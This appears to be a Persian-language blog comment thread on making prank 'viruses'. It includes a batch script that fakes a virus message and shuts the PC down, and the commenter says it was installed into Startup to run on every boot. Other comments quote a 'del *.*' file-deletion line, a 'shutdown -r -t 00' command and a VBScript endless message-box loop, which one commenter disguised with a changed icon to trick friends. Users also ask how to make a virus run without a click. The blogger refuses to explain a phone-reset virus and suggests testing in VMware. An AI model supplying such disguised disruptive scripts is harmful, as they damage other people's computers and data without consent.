    echo Killing all processes…

    start /w wscript.exe C:sleep2000.vbs

    echo Allowing virus to boot from startup…

    start /w wscript.exe C:sleep2000.vbs

    echo:

    echo:

    echo Virus has been executed successfully!

    start /w wscript.exe C:sleep2000.vbs

    echo:

    echo Have fun!

    start /w wscript.exe C:sleep2000.vbs

    pause
    shutdown -s -t 10 -c "Your computer has died by suicide. Better luck next time."

    اینجوریه که اگر فایل باز بشه خاموش میشه کامپیوتر 

    و من اینو با یک برنامه ساخت فایل نصبی اینجوری درست کردم که وقتی نصب شه این فایل بره تو استارت اپ و بعدش وقتی روشن کرد دوباره خاموش بشه 

    و ....

    اگر شما پیشنهادی داری یا اگر ایرادی داره خوشحال میشم بگی

    همیشه معلمم بودی

    Virus32 Virus 32 :
    سلام
    خوبم
    خودت خوبی؟
    اگر شوخیه پس چرا سعی کردی فایل هاشو پاک کنی؟
    • echo del *.*
    هرچند این کدها اکثرشون کار نمیکنن چون اشتباه تایپی توش زیاده
    • cd C:Documents and SettingsAll UsersStart MenuPrograms
    و اینکه خیلی درهم برهم شده
    • اینجوریه که اگر فایل باز بشه خاموش میشه کامپیوتر
    فقط خط آخر کافیه بقیه خط ها همه شون سیا کاریه و ....

    اره ممنون فهمیدم اگه به جای اون همه کد اینو 

    Shutdown -r -t 00 

    مینوشتم هم کار ساز بود 

    راستی برای اینکه چیز های تو استارت اپ فعال نشه باید کلید alt رو بگیریم مگه نه؟

    و سوال دوم اینکه وقتی یک کد درست میکنم و میخوام امتحانش کنم خب مثمان روی سیستم خودم نمیکنم و خب شاید خطر ناک باشه و واسه دوستام هم نمیکنم 

    بنظرت رو چی امتحان کنم؟ رو سرور مجازی مییشه؟یا مثلا برنامه ای هست که مثل ویندوز باشه اما در قالب یک نرم افزار؟

    موفق باشی

    Virus32 Virus 32 :
    شیفت
    میتونی یه ماشین مجازی بسازی
    vMware
    توش میتونی هر سیستم عاملی داشته باشی برای تست

    ممنون

    Virus32 Virus 32 :

    می دونم سوالم خیلی مربوط به این پست نمیشه ولی پرسیدنش اینجا فکر کنم کمتر دردسر داشته باشه D: 

    چحوری میشه ویروس رو به شکلی طراحی کرد که بدون اینکه روش کلیک کنن اجرا بشه ؟ خودم یه چیزایی تو ذهنم هست ولی خیلی گیجم 

    Virus32 Virus 32 :
    راسستش دقیق نمیدونم
    تو فکر خودت چی هست؟
  • Virus32
  • ilia علیزاده
  • ببخشید اگه این پیام برات دوبار اومد چون دفعه قبل که زدم رو ارسال نتم پرید نمیدونم برات اومد یا نه

    ببین دوستم برام یک ویروس فرستاده که منم مثل عملا :| زود فعالش کردم

    حالا اینترنتم به کل قطع شده حتی ویندوز هم عوض کردم بازم نشد

    راه مقابله باهاشو بلدی؟

    Virus32 Virus 32 :
    اکثر ویروس ها با عوض کردن ویندوز غیر فعال میشن
    احتمالا خودت دوباره فعالش کردی
    یا اینکه اصلا کار ویروس نیست نتت قطعه
    شاید درایورهاتو درست نصب نکردی و هزار تا دلیل دیگه

    سلام و خسته نباشید 

    میشه درمورد ویروس هایی که داخل واتساپ فرستاده میشه و معمولا به صورت لینک یا عکس هست توضیح بدید لطفا.

    تو گروه ها میزنن گوشی کامل هنگ میکنه تا چتو پاک نکنی درست نمیشه،، میشه لطفا توضیح بدید اساسش چی هست یا کدی چیزی دارع که آموزش بدید

    Virus32 MicRoB 32 :
    سلام و درود
    این سبک ویروس هایی که میگی حالا بیشتر از طریق لینک الوده وارد گوشی افراد میشن
    حالا بستگی داره که طرف با چه زبانی و با چه هدفی ویروس رو نوشته باشه
    یعضی هاش که میان روی گوشی طرف و با سخت افزار طرف بیت کوین ماین میکنن یا این که بات نت هستن و...
    ولی این که چت رو پاک کنی گوشی اوکی بشه همچین چیزی درست نیست ولی بیشتر وقتا که گوشی ویروسی میشه چون اون ویروس همیشه در حال اجراست مصرف باتری، اینترنت و پردازنده کوشی بیشتر میشه و شاید هنگی هم داشته باشیم.
    در کل برای جلوگیری هم اول از همه این که روی هر لینکی کلیک نکنیم و هر بازی و برنامه ای رو نصب نکنیم بعدشم اگه گوشی ویروسی شد یا شک کردیم که ویروسی شده میشه با یه انتی ویروس خوب گوشی رو چک کرد و در اخر اگه هیچ روشی جواب نداد و دوست داشتی میتونی گوشی رو ریست فاکتوری کنی تا اگه ویروسی هم نصب شده و توی گوشی هست کلا پاک بشه :)

    داداش من راستیتش اصلا چیزی نفهمیدم ساده تر توصیح میدی؟😂

    داداش کجا رو نفهمیدی؟

    do
    x=msgbox("Killer 32")
    loop

    میگه یک دونه msgbox  نشون بده بعد تکرار کن نتونه ببنده

    همین

    Virus32 Virus 32 :
  • Virus32
  • یه دارک وبی /;
  • گذاشتم رو فلش ایکون و اسمشم عوض کردم  خیلی باحال بود دمت گرم 

    میتونی اموزش ساخت یه ویروس فرمت رو بدی؟ چیزی که گوشیو ریسیت کنه!

    Virus32 Virus 32 :
    نه
    ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
    شما میتوانید از این تگهای html استفاده کنید:
    <b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
    تجدید کد امنیتی